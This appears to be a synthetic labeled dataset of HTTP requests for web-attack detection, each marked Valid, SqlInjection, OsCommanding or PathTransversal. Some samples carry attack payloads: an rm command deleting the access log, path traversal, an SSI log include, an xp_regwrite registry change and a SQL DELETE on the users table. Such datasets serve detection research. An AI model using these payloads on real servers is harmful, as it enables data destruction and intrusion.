GET /4DH/HnExXE/ohoafusD8lseesytztpe/ie0tn74zeaesiLiSED8/yee4ctdcnOghiprettaM/wpOlwc/ld.UEdLBl_/eAiLnnoayfrd7.aspx?hphpUExRDt@46e=613445977&umk=oVZVg&amrzh=559093&wopcmohlts=%250arm+++++-f+++%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&Rtlatxmt=7594&svetsI-afdRA=aa&dtE=6973&afw=tbesktOsishefkgoet HTTP/1.0
Host: www.rvhk.be:7
Connection: Neembees
Accept: text/*;q=0.0, text/html;q=0.7, application/x-tar
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 234.49.182.184
Cookie: oiseeIod9=ptoe n4l@ATe7tolr;tge2tt2eioooce=h replace'>;eu3aaAteoe=mAhttpsO;s1ecGxre8xs=29544023;sE2ocdeqirUNol=27118;faamgnbwelre=0815
Cookie2: $Version="169"
Date: Sun, 15 Nov 09 09:11:55 GMT
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 02 Dec 06 07:30:30 CET
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: http://www.Ninr.net/e39he/a8uk/iaeo/62ili/jibots.avi
TE: trailers
Trailer: Cache-Control
User-Agent: SeaReqt (rqrD3_SOb; opYZT9J6n; iYU5AVPV11; eU6P2U9Fc; ofku2_4LJ)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: iai5; 7htdt43t=hees
X-Forwarded-For: 18.24.168.27
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36723
Start - Id: 22133
class: Valid
GET /w7ietc/ererjseToiayruqmrb8s/1-Qer.tiff? HTTP/1.1
Host: 187.206.79.211:80
Connection: jeacqr9y
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, deflate, identity;q=0.6
Accept-Language: co1-Ma, bnwi-Neomenye, g0hha-ie0, jOdkilTe-prwae, ett3tte1-a
Cache-Control: only-if-cached
Client-ip: 66.184.86.91
Cookie: w2cpni=ttosSa|scriptex-edd0 1 wm;N68toeohpgosl=rht~;araha=e@S3azkkFr;ran0rorpn=Chnei;jetu9Rzugrhj6Un=8;vhS=Sdsuean
Cookie2: $Version="10"
Date: Wed, 30 Dec 09 16:44:36 GMT
ETag: "-5mu7Fh3Ou2zJ.g"
Expect: et9a
From: ers7@stiihe.com
If-Modified-Since: Wed, 20 Jul 05 16:52:18 UTC
If-Unmodified-Since: Thu, 14 Dec 06 08:44:16 CET
If-Match: "l6AOyMpnLe7wdrTMmUv"
If-None-Match: "KCcrdGDfWrEmZB1o"
If-Range: Thu, 13 Dec 07 21:11:27 CET
Max-Forwards: 9
MIME-Version: 1.6
Pragma: dEiruO='a4e6oo'
Proxy-Authorization: NTLM ZWhpb2l0Z3JlV3FvYXIzd2NtZGFzVUwyaU5kMmVyb3RkdzZodWg5Ymk=
Authorization: Digest realm
Range: 1976-
Referer: /or00p/hcbon/l0izTepr/tTshur/dOPjd.fgf
TE: gzip;q=0.0,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Dz4dsn/3.4.4.7
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 221x4182
Via: HTTP/7.5 www.ehRrs.png
Transfer-Encoding: identity
Upgrade: ereinf/3.5, eEt0/2.9, zrTT/7.8, hta/4.0
Warning: 309 www.nrtE.htm:0 "s2qhlidru" 
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 0543999319817911662
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22133
Start - Id: 12207
class: Valid
GET /sq4fromYboot.inicSH/oUdIT2.jpeg? HTTP/1.1
Host: 75.117.87.161
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1254;q=0.9, x-mac-arabic, koi8;q=0.8, windows-1255;q=0.5
Accept-Encoding: *
Accept-Language: ob-i0t
Cache-Control: no-cache
Client-ip: 157.216.243.76
Cookie: XnPG=oodfa2s;lemss9zoervidi=g0CrheI5cfay;ehee=21183772;r1gqtpdtn=fm.iRI8s.;mOPNsiiFkgroup byJt=ed5fzJbjo5lZ
Cookie2: $Version="96"
Date: Mon, 01 Dec 08 24:45:41 UTC
ETag: W/"X-auq48L7Uu7dw0R"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Sun, 25 Jan 04 16:57:05 UTC
If-Unmodified-Since: Thu, 01 Apr 10 21:10:02 GMT
If-Match: *
If-None-Match: *
If-Range: "4ZLUAh@4BrHnz4Lnxk"
Max-Forwards: 583
MIME-Version: 0.1
Pragma: r='rrgo'
Proxy-Authorization: whuq neane=nte9e
Authorization: esgl wntes=g9hn
Range: -341,81708-966475
Referer: /et0y/3teg.mdb
TE: deflate;q=0.8,deflate;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/1.1 (compatible; Konqueror/9.4; Open BSD i386; tge7)
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 3.8 212.16.255.138, 2.8 125.71.242.250, 3.5 www.e1ftieun.html
Transfer-Encoding: gzip
Upgrade: 8cClsn/2.6, omSiT3/7.4, f6it2/4.1
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 28.18.79.109
X-Serial-Number: 621249765071434034
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12207
Start - Id: 4094
class: Valid
POST /NvEN/o-dXTYOb3dNd24WAWyde/lt/dcdeleteHLIAjvGh/ewZaexec.2orZD3Tg/hf7uL_eoFXw4CIwzZg@/ihmPhsjbm2o.php3? HTTP/1.1
Content-Length: 55
Content-Language: hghcel,t
Content-Encoding: compress
Content-Location: http://nndseeah.fr/cT5lee.cfm
Content-MD5: c3Nzc2dUcnNlc2VoM2FvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Mar 08 24:36:48 UTC
Last-Modified: Wed, 31 Dec 08 16:57:06 UTC
Host: 100.209.199.78
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rtRtqaiE-txscr;q=0.6, s-aewoegt
Cache-Control: nvtmll=9qwl8Ae
Client-ip: 155.2.169.84
Cookie: n7=nT
Cookie2: $Version="8"
Date: Thu, 03 Aug 06 02:15:18 UTC
ETag: W/"aAN@Uuk_pWwOFQznW6v"
Expect: 100-continue
From: lAink@earlw.gov
If-Modified-Since: Sun, 11 Jan 04 24:45:16 GMT
If-Unmodified-Since: Mon, 04 Dec 06 15:14:39 CET
If-Match: "fUomY_D7bv7-ReiXXY"
If-None-Match: "yXcFQv0-fuXMM3bCYhL"
If-Range: "UMwdxquth8OXUbIjN"
Max-Forwards: 700
MIME-Version: 8.5
Pragma: lsfj='li'
Proxy-Authorization: Basic clVpaGFTOlR0UnBydA==
Authorization: w6hgem yaw4=eg3og
Range: 92-96456,-88312
Referer: http://www.htyrne.it/huisrusi.php3
TE: chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: zoiWoS3n (llDbSR)
UA-CPU: MIPS
UA-Disp: 4996,3715,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1301x1133
Via: 2tattb/0.0 158.150.187.167, FTP/4.3 172.153.4.28, HTTP/0.4 186.53.126.83
Transfer-Encoding: eeEv; reoipig=Yhahuan
Upgrade: eh1/2.8, iari/5.8
Warning: 154 253.72.13.96 "odslseae3oO1ilHaa" "Thu, 11 Jun 09 01:26:19 GMT"
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

8eds1rsuin=hDq3B7T6N6vd&hgfaxiniortlN=ppohlE eoeefnylop

End - Id: 4094
Start - Id: 43820
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: www.ns8theeL.org
Connection: vonm
Accept: text/xml;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dt-t;q=0.6, o-mmi;q=0.1, ude-0aiob, Lk0rdus-zn;q=0.7
Cache-Control: min-fresh=1640
Client-ip: 243.196.30.194
Cookie: r7t97=ioijvx4;3bsktmrreFa4t5=s;rHksIj;oovAhgixl=ttdodrenPxey;dhubssnpSeeq=EsP&;JjRMT1Y7lsKJ=777;em=TIchsareplacea ss)beeet
Cookie2: $Version="513"
Date: Sun, 20 Feb 05 10:04:59 UTC
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Thu, 08 Jul 04 11:04:37 UTC
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "9nhat7-TWn@3Iy1Thkn"
If-Range: *
Max-Forwards: 083
MIME-Version: 5.3
Pragma: nraRhs=3ni8
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest opaque="aias"
Range: 7246-,-7950
Referer: http://www.iogCRn.net/arcmrE/zodtwpe.asmx
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/9.3 (X11; U; Unix 8.8; xC-ye; rv:7.4.8) Gecko/75414516
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 3.8 199.67.119.83
Transfer-Encoding: identity
Upgrade: p3d/0.6, 4skh4H/9.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43820
Start - Id: 19783
class: Valid
GET /y4EphnauLZIECCRyR/8OG5WR6Etzq4/0NEidIfeisV/t5TTNXmv6WHHvNw2RT/iWlz28ZFKSESl@A/eRbjmt2HnL_x6ph.v/i4ldF.nsf?stqhn=+se&umpdftlTkfuh=lmbeseiezoetwrth7&etirraE=535&piotiSetr2=6961&wIbnrjso=67&RnjfwZZKY9X=wi+uc&D7_EzlsG2V=7&uddxl=eSkI5A7bw&tronodppRb=745772&HtNrywedass=835&e8eaoy2lpsnzta7=3377855662&zpperlExnoIVp=fiwjak1eeeo&plbta=esEt+ HTTP/1.1
Host: 85.91.223.50
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=89
Client-ip: 208.144.187.90
Cookie: 1jtetoouenhe6=095810;sRtOttr=h2wXReZDi9P;AzeRwgetq=0091450250
Cookie2: $Version="666"
Date: Wed, 03 Nov 04 14:31:59 GMT
ETag: W/"bWqhNQazozGGLlK2Sa2"
Expect: 7uezpiRu
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 26 Oct 05 16:02:54 GMT
If-Unmodified-Since: Tue, 04 Dec 07 11:40:15 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Dec 06 21:02:36 GMT
Max-Forwards: 0967
MIME-Version: 6.2
Pragma: toke5ror='wAc'
Proxy-Authorization: NTLM NHRpQTVzMWlhYWFzU2F0eW9oYXA3ZXl3eXJ5dDFvbW1ob2FwNDNsaWxPZG9v
Authorization: 9Lriu ieea=5tp0i
Range: 429206-7,67-5603
Referer: /xsvtx/odftke/qhrhy9/AglT9mt/nseszoha.doc
TE: trailers,chunked;q=0.4,deflate
Trailer: Upgrade
User-Agent: atjheeb7m
UA-CPU: x86
UA-Disp: 5903,193,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 951x1383
Via: FTP/2.6 www.iguegu.htm:33361, gidama/3.5 www.fga3.shtml:70321, FTP/7.6 243.75.86.213
Transfer-Encoding: compress
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 212517098577973192
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19783
Start - Id: 35954
class: PathTransversal
POST /eob/ro@wJOBZe1kE/nA0/rwtIT4bbvnEqC1Eo/jd/e6eedwltiocpgt2ra.css? HTTP/1.1
Content-Length: 143
Content-Language: diAatb
Content-Encoding: compress
Content-Location: /oe1c6bh/nctItr2/rncTr/8tmm4rn/eceliosz.php4
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Mar 09 12:27:23 GMT
Host: 224.200.206.36
Connection: keep-alive
Accept-Encoding: identity
Cookie: doclphe2e9eda=eo;qlkeiaq=e4tSewindow.openn'e2;rawc09G=window.opent4lb;veyols7Dnu7Jh=823731;yhfh=<!--#include  virtual="/var/log/httpd/access.log"     -->;eahsdemolt8kos=pmlocationN
Date: Tue, 25 Jan 05 12:59:49 UTC
If-Unmodified-Since: Mon, 01 Mar 04 11:58:11 CET
If-None-Match: "pS.9hhivDFunrEx-hh4-"
If-Range: "5uN_Ih7c0GTg46i@f0"
Max-Forwards: 1
Proxy-Authorization: Digest uri=/cAiRrun/n1ztsd.asp
Referer: /s9ro/thsgesai/gtoaJnd/tcnt/i6Le.exe
TE: chunked;q=0.0
User-Agent: Mozilla/0.3 (Windows; U; Win98 8.1; ir-Er; rv:1.4.8) Gecko/51574936
Via: 5.5 www.acon.htm:68, 7.5 158.16.86.49
Transfer-Encoding: gzip

ocMeewycds=A&bgkiyi9mn7iastb=rsobjectpe=i)bu&evQwV8vq87YO=hirr2rAaistfisahc0&abr=n&ttebeztnamhmi=riAoeo+Fee0r@zl&gGe-=sCKWoWN.&mtei5=99

End - Id: 35954
Start - Id: 7547
class: Valid
POST /o2Cwtymiat0YcEasbvt/nj9fA5jRAo/etrEsDRcc1NU/lsiNasf8tsmo9etie/wNLPT-zservices/cI.asmx? HTTP/1.1
Content-Length: 270
Content-Language: IpaohNuS,dImers,subC
Content-Encoding: deflate
Content-Location: /tRd2n/i3nwi/eous/ttdzgt.swf
Content-MD5: dGlrZWVzc2lzcVRyRW9vbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Aug 09 14:47:16 CET
Last-Modified: Tue, 03 Oct 06 04:52:43 UTC
Host: 63.96.116.33
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.0, deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: min-fresh=38
Client-ip: 145.137.168.172
Cookie: Saucc8grs3=527688;Re=orjn%;s8N=1361;SNttep=dxs@cNx7Ne;96=7856;itseeIefvwfenpe=srd
Cookie2: $Version="5"
Date: Wed, 10 Feb 10 02:22:04 GMT
ETag: W/"R.aisbSEVR_HgA0N"
Expect: fdsUq
From: kgap@SuG1rrgu.net
If-Modified-Since: Fri, 10 Nov 06 02:14:53 GMT
If-Unmodified-Since: Sun, 25 Nov 07 17:19:18 UTC
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: "XhHEWIhgBV38.kA"
If-Range: *
Max-Forwards: 70
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: 31105-
Referer: /rotoWu/6mlHfnk/onPE1Tt/Ckzdnwa.msf
TE: chunked
Trailer: Via
User-Agent: fyckGl http://www.TSaRm.org
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8581x949
Via: HTTP/1.3 www.6rry.html, 5.4 85.179.241.91
Transfer-Encoding: xma8
Upgrade: Tbwl/8.0, e3IaS/2.0
Warning: 217 www.9ie160j.gif "puqyTO1Ctongfiam9t" "Sat, 03 Feb 07 15:31:48 CET"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 1265657430955510284
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sjrsnndsui7p=js~3im( hl;taEoxb8e&nhd=oE&ldaF=o2e3I&SuLwon2=qoulq&i42ogMltfns=Uxaopt%&eKaoecins6ia=exninleulee&resYGN=snhrceneidqc&Itlp1e7o=76836561&rd2neitnf=SscghxabhF1ry&iiHjzhtpass4=ncs&penap=21&5oW9porc8ien=adtatiA8roefHava&eztteryYn1=654&eghm4eC=erSumvqnOay

End - Id: 7547
Start - Id: 41165
class: SqlInjection
POST /sN7LppnignOybg7kZD/hhlQeh1d/6@ks@mailAm.wkn_/Etaeixt85/0shrr/oh_.z7uqw.xbpIsmXXBj/iRdilJieejr/zlib4ID3usrAqT3RICf/t.5QieVbQtwyTf62cp/inltIusi/-3ssprocessing-instructionyecat@/qTopenz4JqgL.php3? HTTP/1.1
Content-Length: 54
Content-Language: Jd,hestt4ee,nNlIdlo9
Content-Encoding: gzip
Content-Location: http://atnt.de/aytbd/nutetr/5reye/bUreg.gif
Content-MD5: YXRpd2VlZWFlbnRvdWVueA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Apr 06 17:56:42 UTC
Last-Modified: Fri, 25 Jan 08 12:55:00 CET
Host: 143.241.130.115
Connection: dhi5isea
Accept: image/jpeg, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: exec   xp_regwrite   'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','hinrtiIa3','REG_SZ','DBMSSOCN,hackersip,80'
Accept-Language: *;q=0.5
Cache-Control: max-age=05
Cookie: gdyhrateee2=ayuse;nlmw=9'w~bHqjd>huniont;sig4Xugsq=nph-q\3
Cookie2: $Version="67"
Date: Wed, 10 Dec 08 05:20:02 GMT
ETag: W/"2AMDMtdOi6gNusXmK7"
If-Modified-Since: Wed, 01 Dec 04 10:02:03 UTC
If-Unmodified-Since: Mon, 28 Feb 05 11:54:06 UTC
If-Match: "0@ThdOzumkvRzwxp"
If-None-Match: *
If-Range: Wed, 03 Aug 05 17:20:35 CET
Max-Forwards: 2341
Pragma: no-cache
Authorization: Digest response="B6016cF344c8aAda0Af7b5F78A76f6Fc"
Referer: http://ivHgumI.gov/4pxeoes.mspx
TE: gzip;q=0.2,deflate,trailers
User-Agent: nEiaeu (nAcQufLM)
UA-OS: Windows 95
UA-Pixels: 2262x8961
Transfer-Encoding: compress

aIwEs=G<&3au0eeAsG=<eboot.init&hqrdenrqiaeaL=tb0as

End - Id: 41165
Start - Id: 41439
class: SqlInjection
POST /pbfeFsrj0er/eMigjo3ettsotesi/a460g.zmWScy/o5/bexec/Bs_U/biF4rJaE.dll? HTTP/1.0
Content-Length: 297
Content-Language: dea,nSqne
Content-Encoding: gzip
Content-Location: /aetas.swf
Content-MD5: c2wzTm9tZGdscjlsYW5zbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jul 07 07:21:26 UTC
Last-Modified: Mon, 19 May 08 08:51:37 GMT
Host: www.ohijssE.st:8
Connection: hepLcw2
Accept: audio/x-wav, audio/x-wav, application/*;q=0.3
Accept-Charset: windows-1258
Accept-Encoding: *;q=0.7
Accept-Language: gg9amsih-bdnnt
Cache-Control: no-store
Client-ip: 49.5.19.137
Cookie: ib7==eH2noshH;htsTeouyE=it5;irOpaTgiy6fdso9=boot.inirsOrne3;wetceiaiebos=9521
Cookie2: $Version="41"
Date: Fri, 30 Mar 07 12:34:16 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "LksjpT9Vqso3VodlRT"
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM b3R1aG44RW51a05sdXQzdGV6Y3RlNGlmbHc0ZHJnZWE3c3RvZWw=
Authorization: pqonb enmhpnom=fenruoo7
Range: -86
Referer: /vxadou.css
TE: deflate;q=0.2
Trailer: Date
User-Agent: t7aabAhwab/9.6
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

leo5aRgMtneauPg=at5n' );DELETEFROMusersWHEREupper(username)  =  upper('admin&TSbD4bd1IB=9dlia7qd45Cqlibm&8antaonayyeiE0e=t&TseN=rraL6mq&nt2usou=1hehttp;igzsiposition7rw&cahig=ttawdwOtyRrwerMr&tlhemeaehati=>hnr &o6l=n@trT-82b&QKWu=operllocation&q1Crth3hopm=5&OtTmEtelnet=ha 6h

End - Id: 41439
Start - Id: 11599
class: Valid
GET /dservicesbzZSL/gt0yjacl/he9ETSv/wwQoaEni/nyI/er9tace.css?.tFAUservices=euv0Ya1aeaoKdri&tcwl=98751611&a6aesd=397600&eoi=leisOot7Retsati&ieese4nnAe4f=6598414&ezahilonfsiscu=%5C2re&nwrsh=g-nofnhhLE%24sii%3Anku%3A&uriyiit5o=+arnph-k&e8snTomtsat3=eerstlioein4amxewi&6TnoDe=tN&a2hxsTaiys=ef&3reingrn=+dhr HTTP/1.0
Host: www.sMesn.fr
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1254;q=0.4, windows-1257;q=0.0, koi8, x-mac-cyrillic, cp-932
Accept-Encoding: compress;q=0.6, identity, identity;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 0.218.149.249
Cookie: iyns4Sieoy=rtelikesP=IE;uc1sgEe=tn;slcoKoiss9ea=pna%lpen>vi&hnz;setiuuvwipq2n=t63suoa)l et:o
Cookie2: $Version="797"
Date: Sun, 10 Feb 08 20:30:12 UTC
ETag: "NG7CZirueJmUZ1Rf"
Expect: ieHlenh
From: EDcpa6@fUssmevbFt.be
If-Modified-Since: Tue, 16 May 06 24:18:05 GMT
If-Unmodified-Since: Mon, 04 Feb 08 20:31:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Jun 07 19:27:57 GMT
Max-Forwards: 5
MIME-Version: 8.5
Pragma: y='e'
Proxy-Authorization: Basic aUlpOTY6bGVpbg==
Authorization: Basic bmZubmh0aTpubXRtd3Nz
Range: 4539-2283,-21
Referer: /jlirsz/njPTf/zttetl/yrBuCoi/zjhTr.fgf
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: wstribn5 (z@DS9E0j; s_FhHbu; aFYRgJ; dV8Y1On0n; xoJAHL)
UA-CPU: x86
UA-Disp: 503,414,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3585x2586
Via: FTP/3.8 103.162.5.94
Transfer-Encoding: deflate
Upgrade: vot/1.6
Warning: 451 www.po0to.tiff "IpT6h0ONe0T" "Sun, 10 May 09 06:25:33 GMT"
X-Forwarded-For: 61.41.0.191
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11599
Start - Id: 28563
class: Valid
GET /tSTL1TjkRIp/odc8uthnnsbq/q8BVppbmU/eJJ/h@FrMTQH.htm?Ehy8yAw=0707&5sgQefgi=nzUrNqC9M6_&ultstsith=hU%40tchildanvwtnin&b4hDrexoft=aqqD&rnmLn=eey%3F2aoTncu%3Ct2&O3tsan=da4&srtca3sfsc9ppE=hTocwthtO+ksmr&eyres6ua=38466&esrg2Syebhi=97759377 HTTP/1.1
Host: 142.25.153.223
Connection: keep-alive
Accept: application/*, image/png, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 72.50.172.162
Cookie: tb7hjsoteaii=odI2Itw;iTmveecvwh=1;Wnafondnlpd8edb=481701
Cookie2: $Version="29"
Date: Mon, 22 May 06 15:00:54 UTC
ETag: "ILQxJFWCEHOjcBK"
Expect: st4TiC
From: itsrdeii@e8igfye.ch
If-Modified-Since: Thu, 28 May 09 20:12:44 CET
If-Unmodified-Since: Thu, 29 Jul 04 02:22:33 UTC
If-Match: "l9_HjSa4JK0umsuwL0"
If-None-Match: "_SOzNlHxujCu7fssrd2j"
If-Range: *
Max-Forwards: 4216
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic cmllWDo2aGlyRw==
Authorization: bEnr arete3=rgoeh
Range: -120887,-07
Referer: http://www.4odhY.cz/asr34dM/cucltdI/sraf2he/p3aele.dll
TE: trailers
Trailer: Transfer-Encoding
User-Agent: mT4ucsW http://www.Ahawrme.st
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5673x9154
Via: FTP/9.4 125.210.6.149
Transfer-Encoding: compress
Upgrade: t5l0r/1.9, snn9tt/9.1, awj/9.4
Warning: 706 68.33.10.49 "oacstosoahkra" 
X-Forwarded-For: 155.113.177.135
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28563
Start - Id: 34351
class: Valid
PUT /eoOtpxy/onfeaoAmedd/eZDo32a3IPcYMYD@ak/rt6IkuN5M6GEZ4/8eT/nFAsxi6XQZOMCZBuB3mO/t1i44K7Tx/oAhsitlri.nsf? HTTP/1.0
Content-Length: 339
Content-Language: 3na,n5
Content-Encoding: compress
Content-Location: http://Slrn.cz/iyihuvh/intAbus/ANseen/nidbKtn.css
Content-MD5: b3Vsd2x2bHNvcmFtU2R0UQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Jul 09 20:09:54 CET
Last-Modified: Sun, 30 Dec 07 07:43:13 GMT
Host: 141.58.226.142:80
Connection: keep-alive
Accept: audio/x-wav;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6214
Client-ip: 199.114.227.18
Cookie: asahn5aDii07k=edsesszhsfq;trKvmailhrs3vnc=ep deoliuaa;n3=liL0i;Uudo1inohtEe=tuuj;nE=377506;zcta=89620624
Cookie2: $Version="527"
Date: Wed, 15 Aug 07 09:47:59 GMT
ETag: W/"JH22Y2s2axVE.yZh.f"
Expect: 100-continue
From: t2xq@eaabstcA.de
If-Modified-Since: Tue, 08 May 07 20:10:41 GMT
If-Unmodified-Since: Wed, 22 Jul 09 04:46:14 GMT
If-Match: *
If-None-Match: *
If-Range: "EUvCQGVuZ3qol6azZ0j"
Max-Forwards: 8516
MIME-Version: 3.9
Pragma: co=piSoh
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: elewio 7yleAo=h5Aycl
Range: 780-7889
Referer: http://www.rbo4.be/Sqtrsuf.png
TE: deflate,chunked;q=0.7
Trailer: User-Agent
User-Agent: aAtcj4
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5210x2253
Via: FTP/3.3 www.63ass0.png
Transfer-Encoding: wAewT; 8gn9ei=xvfgnu
Upgrade: wgm/3.9, moe/0.2, 2mn/3.5, eeqae/7.0
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 114.98.89.168
X-Serial-Number: 418428957866
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r7e4tlsnSbetuO=stdinHre&ua=nf.QiZtw&Thn4=e2wUO5HrEM1M&XautoexecIoespwH9=wUt0w&8diPtsvaGnaeds=e %ss<hlogp:ntandenubte&nth8f0ahc06Wsh=ue owiloElsl8e>octc&2nysos3uphaep=b7window.opentIas\+nTrb&\m&hr&vls=i4xZzxwm3&suseA4Metika=rthcnodsht&likee8VbXQCRA=5315&so=ssN7OEX_&Pahlb5eliennt=gK2palgfldnwrtes&b5lMythtcbeode=t?nao@

End - Id: 34351
Start - Id: 26242
class: Valid
GET /13rsUOyAtAYMVTEoAuJ/rZwUW.o.V-6T-4.H0cgp/_LE4hPlMQmq.html?Q2bautoexecwPv2=ie7oE19rmsFp42&stoa=as1aa9tilv-t&fdd2ntmSeh9=08&dgceesrm=a&crieEosbsaitK=ivc&QHO4407NH=1862364&C2Uzinput5=r00&cee=h6rdtd7c&eiztcmo=ftei&harlhtulp=ez7VA-SnMS&.5yHMD=d&aio=y+Ur+ HTTP/1.0
Host: www.refo4.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: M-baRht
Cache-Control: a3zifnm='e'
Client-ip: 196.161.77.5
Cookie: vihm=lsi+;tu=t@QKO
Cookie2: $Version="197"
Date: Sat, 23 Sep 06 24:40:08 CET
